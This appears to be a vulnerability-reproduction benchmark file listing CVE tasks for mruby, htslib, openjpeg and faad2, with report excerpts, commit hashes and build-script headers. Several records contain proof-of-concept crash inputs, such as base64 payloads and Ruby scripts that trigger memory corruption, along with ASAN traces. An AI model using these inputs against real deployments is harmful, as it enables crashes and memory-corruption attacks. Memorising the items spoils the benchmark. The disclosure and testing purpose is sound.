# Copyright 2019 Google Inc. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing,...
/src/mruby
[]
mruby.cve-2022-0614
mruby/mruby
ad3ce7b41c4375f818d02a24e6a09cbc790048c9
https://huntr.dev/bounties/a980ce4d-c359-4425-92c4-e844c0055879
c++
From https://huntr.dev/bounties/a980ce4d-c359-4425-92c4-e844c0055879: Description Using out of range pointer occurs in entry_deleted_p(). commit : ad3ce7b41c4375f818d02a24e6a09cbc790048c9 Proof of Concept $ echo -ne "MC5TJDAsKir9PTAsdjowLHY6MA==" | base64 -d > poc # ASAN $ ./bin/mruby.asan poc AddressSanitizer:DEADLY...
#!/bin/bash -eu # Copyright 2019 Google Inc. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agree...
# Copyright 2019 Google Inc. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing,...
/src/mruby
[]
mruby.cve-2022-0632
mruby/mruby
ecb28f4bf463483cf914c799d086b0cfff997aee
https://huntr.dev/bounties/3e5bb8f6-30fd-4553-86dd-761e9459ce1b
c++
From https://huntr.dev/bounties/3e5bb8f6-30fd-4553-86dd-761e9459ce1b: Description There is a NULL Pointer Dereference in ary_concat (array.c:301). This bug has been found on mruby lastest commit (hash ecb28f4bf463483cf914c799d086b0cfff997aee) on Ubuntu 20.04 for x86_64/amd64. Proof of Concept The crash is not reproduci...
#!/bin/bash -eu # Copyright 2019 Google Inc. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agree...
# Copyright 2019 Google Inc. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing,...
/src/mruby
[]
mruby.cve-2022-0890
mruby/mruby
c2f7ed514dfa0fcae2e7e72d51f25be3d3d6d72c
https://huntr.dev/bounties/68e09ec1-6cc7-48b8-981d-30f478c70276
c++
From https://huntr.dev/bounties/68e09ec1-6cc7-48b8-981d-30f478c70276: Description There is a NULL Pointer Dereference in mrb_vm_exec (vm.c:1929). This bug has been found on mruby lastest commit (hash c2f7ed514dfa0fcae2e7e72d51f25be3d3d6d72c) on Ubuntu 20.04 for x86_64/amd64. Proof of Concept 1- Clone repo and build wit...
#!/bin/bash -eu # Copyright 2019 Google Inc. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agree...
# Copyright 2019 Google Inc. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing,...
/src/mruby
[]
mruby.cve-2022-1201
mruby/mruby
00acae117da1b45b318dc36531a7b0021b8097ae
https://huntr.dev/bounties/6f930add-c9d8-4870-ae56-d4bd8354703b
c++
From https://huntr.dev/bounties/6f930add-c9d8-4870-ae56-d4bd8354703b: Description NULL Pointer Dereference in mrb_vm_exec with super Proof of Concept o13 = Comparable.initialize(){||0x7f.instance_eval() do super rescue caller (0..1).sort_by() do break end end } // PoC.js ./mruby 1.rb #Result ASAN:DEADLYSIGNAL =========...
#!/bin/bash -eu # Copyright 2019 Google Inc. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agree...
# Copyright 2019 Google Inc. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing,...
/src/mruby
[]
mruby.cve-2022-0080
mruby/mruby
28ccc664e5dcd3f9d55173e9afde77c4705a9ab6
https://huntr.dev/bounties/59a70392-4864-4ce3-8e35-6ac2111d1e2e
c++
From https://huntr.dev/bounties/59a70392-4864-4ce3-8e35-6ac2111d1e2e: Description Heap Base Buffer Overflow mrb_irep_cutref Proof of Concept ( *a = () ) a.<<.take_while{ a.drop_while {Enumerable ; a<<lambda {}}} Impact mruby/bin/mirb ./cr mirb - Embeddable Interactive Ruby Shell => nil too many irep references (Runti...
#!/bin/bash -eu # Copyright 2019 Google Inc. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agree...
# Copyright 2019 Google Inc. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing,...
/src/mruby
[]
mruby.cve-2022-0525
mruby/mruby
903c5f978a2966465d8d5c6dfac55a977d134287
https://huntr.dev/bounties/e19e109f-acf0-4048-8ee8-1b10a870f1e9
c++
From https://huntr.dev/bounties/e19e109f-acf0-4048-8ee8-1b10a870f1e9: Description OOB read and OOB write in mrb_ary_push. commit : 903c5f978a2966465d8d5c6dfac55a977d134287 Proof of Concept $ echo -ne "bAticjWSUkRPTkxZC2I9e30MWyohMCxtOjAwLG06MF09MXxbKiEwLG0wXQo=" |base64 -d > poc # ASAN $ ./bin/mruby ./poc AddressSanit...
#!/bin/bash -eu # Copyright 2019 Google Inc. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agree...
# Copyright 2019 Google Inc. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing,...
/src/mruby
[]
mruby.cve-2022-0570
mruby/mruby
d912b864df3199f2108601a0451532c587a5e830
https://huntr.dev/bounties/65a7632e-f95b-4836-b1a7-9cb95e5124f1
c++
From https://huntr.dev/bounties/65a7632e-f95b-4836-b1a7-9cb95e5124f1: Description Heap Overflow occurs in mrb_f_send(). commit : d912b864df3199f2108601a0451532c587a5e830 Proof of Concept $ echo -ne "c2VuZCJzZW5kIiwic2VuZCIsInNlbmQiLCJzZW5kIiwic2VuZCIsInNlbmQiLCJzZW5kIiwic2Vu ZCIsInNlbmQiLCJzZW5kIiwic2VuZCIsInNlbmQiLCJz...
#!/bin/bash -eu # Copyright 2019 Google Inc. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agree...
# Copyright 2019 Google Inc. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing,...
/src/mruby
[]
mruby.cve-2022-0623
mruby/mruby
4e8ab145da52c3cfb0bd4b823df8041dcc52f454
https://huntr.dev/bounties/5b908ac7-d8f1-4fcd-9355-85df565f7580
c++
From https://huntr.dev/bounties/5b908ac7-d8f1-4fcd-9355-85df565f7580: Description commit 4e8ab145da52c3cfb0bd4b823df8041dcc52f454 Author: Yukihiro "Matz" Matsumoto matz@ruby.or.jp Date: Tue Feb 8 13:03:51 2022 +0900 Proof of Concept $ echo -ne "e30KWyoqMCxtOjBdBHM9MDYudGl0ZXN7My7+////c3slXSN7W11lYWsKYj17fQpbKiowLG06MF3...
#!/bin/bash -eu # Copyright 2019 Google Inc. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agree...
# Copyright 2019 Google Inc. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing,...
/src/mruby
[]
mruby.cve-2022-0631
mruby/mruby
38b164ace7d6ae1c367883a3d67d7f559783faad
https://huntr.dev/bounties/9bdc49ca-6697-4adc-a785-081e1961bf40
c++
From https://huntr.dev/bounties/9bdc49ca-6697-4adc-a785-081e1961bf40: Description Heap Overflow occurs in mrb_f_send(). commit : 38b164ace7d6ae1c367883a3d67d7f559783faad Proof of Concept $ echo -ne "c2VuZCJzZW5kIiwic2VuZCIsInNlbmQiLCJzZW5kIiwic2VuZCIsInNlbmQiLCJzZW5kIiwic2Vu ZCIsInNlbmQiLCJzZW5kIiwic2VuZCIsInNlbmQiLCJz...
#!/bin/bash -eu # Copyright 2019 Google Inc. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agree...
# Copyright 2019 Google Inc. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing,...
/src/mruby
[]
mruby.cve-2022-0717
mruby/mruby
5d9239c2c4644fa8a59d9f5159b4950569dd5e0e
https://huntr.dev/bounties/27a851a5-7ebf-409b-854f-b2614771e8f9
c++
From https://huntr.dev/bounties/27a851a5-7ebf-409b-854f-b2614771e8f9: Description OOB read occurs in mrb_ary_push(). commit : 5d9239c2c4644fa8a59d9f5159b4950569dd5e0e Proof of Concept # poc $ echo -ne "WzpfXVswLDAsMCwwLDAsMCwwLDAsMCwwLDAsMCwwLDBdPTpO" | base64 -d > poc # ASAN $ ./bin/mruby poc AddressSanitizer:DEADLY...
#!/bin/bash -eu # Copyright 2019 Google Inc. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agree...
# Copyright 2019 Google Inc. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing,...
/src/mruby
[]
mruby.cve-2022-1212
mruby/mruby
60cf382ff9765e36b21143d79688a3e758b66fd4
https://huntr.dev/bounties/9fcc06d0-08e4-49c8-afda-2cae40946abe
c++
From https://huntr.dev/bounties/9fcc06d0-08e4-49c8-afda-2cae40946abe: Affected commit: 60cf382ff9765e36b21143d79688a3e758b66fd4 Proof of Concept v11 = '1111111111111111111111111111' v17 = {1=>1, 2 => 'b' , '3' => 1} v20 = [] [1,2,3,4,5,6,7,8,9,10,11,12,13,14].find_all() do [1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17].s...
#!/bin/bash -eu # Copyright 2019 Google Inc. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agree...
# Copyright 2019 Google Inc. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing,...
/src/mruby
[]
mruby.cve-2022-1276
mruby/mruby
3cf291f72224715942beaf8553e42ba8891ab3c6
https://huntr.dev/bounties/6ea041d1-e2aa-472c-bf3e-da5fa8726c25
c++
From https://huntr.dev/bounties/6ea041d1-e2aa-472c-bf3e-da5fa8726c25: Out-of-bounds Read in mrb_get_args in mruby/mruby Affected commit 3cf291f72224715942beaf8553e42ba8891ab3c6 Proof of Concept 0..% = [0,0,0,0,0,0,0,0,0,0,0,0,0,**{}] = 0 Below is the output from mruby ASAN build: AddressSanitizer:DEADLYSIGNAL =========...
#!/bin/bash -eu # Copyright 2019 Google Inc. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agree...
# Copyright 2019 Google Inc. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing,...
/src/mruby
[]
mruby.cve-2022-1286
mruby/mruby
3cf291f72224715942beaf8553e42ba8891ab3c6
https://huntr.dev/bounties/f918376e-b488-4113-963d-ffe8716e4189
c++
From https://huntr.dev/bounties/f918376e-b488-4113-963d-ffe8716e4189: Affected commit: 3cf291f72224715942beaf8553e42ba8891ab3c6 Proof of Concept v10 = 0 v15 = "" v16 = [] srand(1337) v20 = protected_methods.fill(){|| v20 = Array.instance_eval(){|| method method private_methods.zip() rescue GC.start remove_method remo...
#!/bin/bash -eu # Copyright 2019 Google Inc. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agree...
# Copyright 2019 Google Inc. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing,...
/src/mruby
[]
mruby.cve-2017-0898
mruby/mruby
1a3b32343ed9ebf287ae5a0f241877728e62bea5
https://hackerone.com/reports/212241
c++
From https://github.com/mruby/mruby/issues/3722: Issue Title: Heap use-after-free in mrb_str_format Issue Body: The following input demonstrates a crash: ```ruby def method_missing(*) sprintf("%c%s", 0, 0) 0[] end foo ``` ASAN report: ``` ==94995==ERROR: AddressSanitizer: heap-use-after-free on address 0x61d00001...
#!/bin/bash -eu # Copyright 2019 Google Inc. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agree...
# Copyright 2019 Google Inc. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing,...
/src/mruby
[]
mruby.cve-2018-11743
mruby/mruby
b64ce17852b180dfeea81cf458660be41a78974d
https://github.com/mruby/mruby/issues/4027
c++
From https://github.com/mruby/mruby/issues/4027: Issue Title: Use of uninitialized pointer in mrb_hash_keys Issue Body: The following input demonstrates a crash: ```ruby (Hash::prepend Enumerable).dup() ``` ASAN report: ``` ASAN:DEADLYSIGNAL ================================================================= ==37239==ER...
#!/bin/bash -eu # Copyright 2019 Google Inc. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agree...
# Copyright 2019 Google Inc. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing,...
/src/mruby
[]
mruby.cve-2020-6838
mruby/mruby
694089fafe4eae36c379a3d918d540eb0c4b8661
https://github.com/mruby/mruby/issues/4926
c++
From https://github.com/mruby/mruby/issues/4926: Issue Title: heap use after free in hash_values_at in mrbgems/mruby-hash-ext/src/hash-ext.c:33 Issue Body: compile mruby in ubuntu18.04 64 bit with ASAN. poc: ``` a=0 b="asdfasdfasdf adaf asdf asdfa sdf asdfasdfasdfa sdf" c={1=>1, 2=>"foo", "foo"=>nil, nil=> nil} d=[1...
#!/bin/bash -eu # Copyright 2019 Google Inc. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agree...
# Copyright 2019 Google Inc. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing,...
/src/mruby
[]
htslib.cve-2018-13843
samtools/htslib
99acb64270f43a015672b4cd9e72c3b02c334c4d
https://github.com/samtools/htslib/issues/731#issue-339662537
c++
From https://github.com/samtools/htslib/issues/731#issue-339662537: From https://github.com/samtools/htslib/issues/731#issue-339662537: Issue Title: A memory leak detected. Issue Body: Sorry for that I didn't reply in my last issue immediately because I had some other stuffs to handle then. Well ,it seems that you hav...
#!/bin/bash -eu # Copyright 2018 Google Inc. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agree...
# Copyright 2018 Google Inc. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing,...
/src/htslib
[]
openjpeg.cve-2020-27814
uclouvain/openjpeg
491299eb073c80602ca8ee333303a31a581d3fa8
https://github.com/uclouvain/openjpeg/issues/1283
c++
From https://github.com/uclouvain/openjpeg/issues/1283: Issue Title: Heap-buffer-overflow in lib/openjp2/mqc.c:499 Issue Body: I found a heap buffer overflow in the current master ([491299e](https://github.com/uclouvain/openjpeg/commit/491299eb073c80602ca8ee333303a31a581d3fa8)). I build openjpeg with ASAN, this is AS...
#!/bin/bash -eu # Copyright 2017 Google Inc. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agree...
# Copyright 2017 Google Inc. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing,...
/src/openjpeg
[]
openjpeg.cve-2021-3575
uclouvain/openjpeg
0bda7188b7b545232a341f1d978b1e4feda46fc2
https://github.com/uclouvain/openjpeg/issues/1347
c++
From https://github.com/uclouvain/openjpeg/issues/1347: Issue Title: Heap-buffer-overflow in color.c:379:42 in sycc420_to_rgb Issue Body: Hi, I found a vulnerability in current master [0bda718](https://github.com/uclouvain/openjpeg/commit/0bda7188b7b545232a341f1d978b1e4feda46fc2), and I also reproduced it on latest re...
#!/bin/bash -eu # Copyright 2017 Google Inc. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agree...
# Copyright 2017 Google Inc. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing,...
/src/openjpeg
[]
openjpeg.cve-2019-6988
uclouvain/openjpeg
51f097e6d5754ddae93e716276fe8176b44ec548
https://github.com/uclouvain/openjpeg/issues/1178
c++
From https://github.com/uclouvain/openjpeg/issues/1178: From https://github.com/uclouvain/openjpeg/issues/1178: From https://github.com/uclouvain/openjpeg/issues/1178: Issue Title: memory exhauted and hangs long time when use 64bit opj_decompress (CVE-2019-6988) Issue Body: I found a problem which will cause memory is...
#!/bin/bash -eu # Copyright 2017 Google Inc. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agree...
# Copyright 2017 Google Inc. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing,...
/src/openjpeg
[]
openjpeg.cve-2021-29338
uclouvain/openjpeg
0bda7188b7b545232a341f1d978b1e4feda46fc2
https://github.com/uclouvain/openjpeg/issues/1338
c++
From https://github.com/uclouvain/openjpeg/issues/1338: From https://github.com/uclouvain/openjpeg/issues/1338: From https://github.com/uclouvain/openjpeg/issues/1338: Issue Title: Integer Overflow in num_images Issue Body: Hello openjpeg2 team, I found an integer overflow vulnerability in the command line options. ``...
#!/bin/bash -eu # Copyright 2017 Google Inc. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agree...
# Copyright 2017 Google Inc. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing,...
/src/openjpeg
[]
faad2.cve-2018-20194
knik0/faad2
6b4a7cde30f2e2cb03e78ef476cc73179cfffda3
https://github.com/knik0/faad2/issues/21
c++
From https://github.com/knik0/faad2/issues/21: From https://github.com/knik0/faad2/issues/21: Issue Title: stack-buffer-underflow in function calculate_gain(libfaad/sbr_hfadj.c:1314) Issue Body: Hi, i found a stack-buffer-overflow bug in Freeware Advanced Audio Decoder 2 (FAAD2) 2.8.8, the details are below(ASAN): `...
#!/bin/bash -eu # Copyright 2023 Google LLC # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed...
# Copyright 2023 Google LLC # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, ...
/src/faad2
[]
faad2.cve-2021-32272
knik0/faad2
1073aeef823cafd844704389e9a497c257768e2f
https://github.com/knik0/faad2/issues/57
c++
From https://github.com/knik0/faad2/issues/57: Issue Title: A heap-buffer-overflow in mp4read.c:355:29 Issue Body: ## System info Ubuntu x86_64, clang 6.0, faad (latest master [1073ae](https://github.com/knik0/faad2/commit/1073aeef823cafd844704389e9a497c257768e2f)) ## Configure CFLAGS="-g -fsanitize=address" LDFLAG...
#!/bin/bash -eu # Copyright 2023 Google LLC # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed...
# Copyright 2023 Google LLC # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, ...
/src/faad2
[]
faad2.cve-2021-32273
knik0/faad2
eb19fa58e08ffad79fe4af09abc0b5a584b4e6e6
https://github.com/knik0/faad2/issues/56
c++
From https://github.com/knik0/faad2/issues/56: Issue Title: A stack-buffer-overflow in mp4read.c:141:9 Issue Body: ## System info Ubuntu x86_64, clang 6.0, faad (latest master [eb19fa](https://github.com/knik0/faad2/commit/eb19fa58e08ffad79fe4af09abc0b5a584b4e6e6)) ## Configure CFLAGS="-g -fsanitize=address" LDFLA...
#!/bin/bash -eu # Copyright 2023 Google LLC # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed...
# Copyright 2023 Google LLC # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, ...
/src/faad2
[]
faad2.cve-2021-32274
knik0/faad2
1073aeef823cafd844704389e9a497c257768e2f
https://github.com/knik0/faad2/issues/60
c++
From https://github.com/knik0/faad2/issues/60: Issue Title: A heap-buffer-overflow in sbr_qmf.c:614:27 Issue Body: ## System info Ubuntu x86_64, clang 6.0, faad (latest master [1073ae](https://github.com/knik0/faad2/commit/1073aeef823cafd844704389e9a497c257768e2f)) ## Configure CFLAGS="-g -fsanitize=address" LDFLAG...
#!/bin/bash -eu # Copyright 2023 Google LLC # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed...
# Copyright 2023 Google LLC # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, ...
/src/faad2
[]
faad2.cve-2021-32277
knik0/faad2
1073aeef823cafd844704389e9a497c257768e2f
https://github.com/knik0/faad2/issues/59
c++
From https://github.com/knik0/faad2/issues/59: Issue Title: A heap-buffer-overflow in sbr_qmf.c:96:77 Issue Body: ## System info Ubuntu x86_64, clang 6.0, faad (latest master [1073ae](https://github.com/knik0/faad2/commit/1073aeef823cafd844704389e9a497c257768e2f)) ## Configure CFLAGS="-g -fsanitize=address" LDFLAGS...
#!/bin/bash -eu # Copyright 2023 Google LLC # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed...
# Copyright 2023 Google LLC # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, ...
/src/faad2
[]
faad2.cve-2021-32278
knik0/faad2
f71b5e81f563d94fa284977a326520d269d8353e
https://github.com/knik0/faad2/issues/62
c++
From https://github.com/knik0/faad2/issues/62: Issue Title: A heap-buffer-overflow in lt_predict.c:108:36 Issue Body: ## System info Ubuntu x86_64, clang 6.0, faad (latest master [f71b5e](https://github.com/knik0/faad2/commit/f71b5e81f563d94fa284977a326520d269d8353e)) ## Configure CFLAGS="-g -fsanitize=address" LDF...
#!/bin/bash -eu # Copyright 2023 Google LLC # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed...
# Copyright 2023 Google LLC # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, ...
/src/faad2
[]
faad2.cve-2018-20199
knik0/faad2
3b80a57483a6bc822d3ce3cc640fa81737a87c54
https://github.com/knik0/faad2/issues/24
c++
From https://github.com/knik0/faad2/issues/24: From https://github.com/knik0/faad2/issues/24: From https://github.com/knik0/faad2/issues/24: Issue Title: Null pointer dereference vulnerability in ifilter_bank(libfaad/filtbank.c:223) Issue Body: Hi, i found a null pointer dereference bug in Freeware Advanced Audio Deco...
#!/bin/bash -eu # Copyright 2023 Google LLC # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed...
# Copyright 2023 Google LLC # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, ...
/src/faad2
[]
faad2.cve-2018-20357
knik0/faad2
6b4a7cde30f2e2cb03e78ef476cc73179cfffda3
https://github.com/knik0/faad2/issues/28
c++
From https://github.com/knik0/faad2/issues/28: From https://github.com/knik0/faad2/issues/28: From https://github.com/knik0/faad2/issues/28: Issue Title: Null pointer dereference vulnerability in sbr_process_channel(libfaad/sbr_dec.c:413) Issue Body: Hi, i found a null pointer dereference bug in Freeware Advanced Audi...
#!/bin/bash -eu # Copyright 2023 Google LLC # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed...
# Copyright 2023 Google LLC # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, ...
/src/faad2
[]
faad2.cve-2018-20360
knik0/faad2
3b80a57483a6bc822d3ce3cc640fa81737a87c54
https://github.com/knik0/faad2/issues/32
c++
From https://github.com/knik0/faad2/issues/32: From https://github.com/knik0/faad2/issues/32: From https://github.com/knik0/faad2/issues/32: Issue Title: Invalid memory address dereference in sbr_process_channel (in libfaad/sbr_dec.c:375) Issue Body: Hi, i found a issue in Freeware Advanced Audio Decoder 2 (FAAD2) 2.8...
#!/bin/bash -eu # Copyright 2023 Google LLC # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed...
# Copyright 2023 Google LLC # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, ...
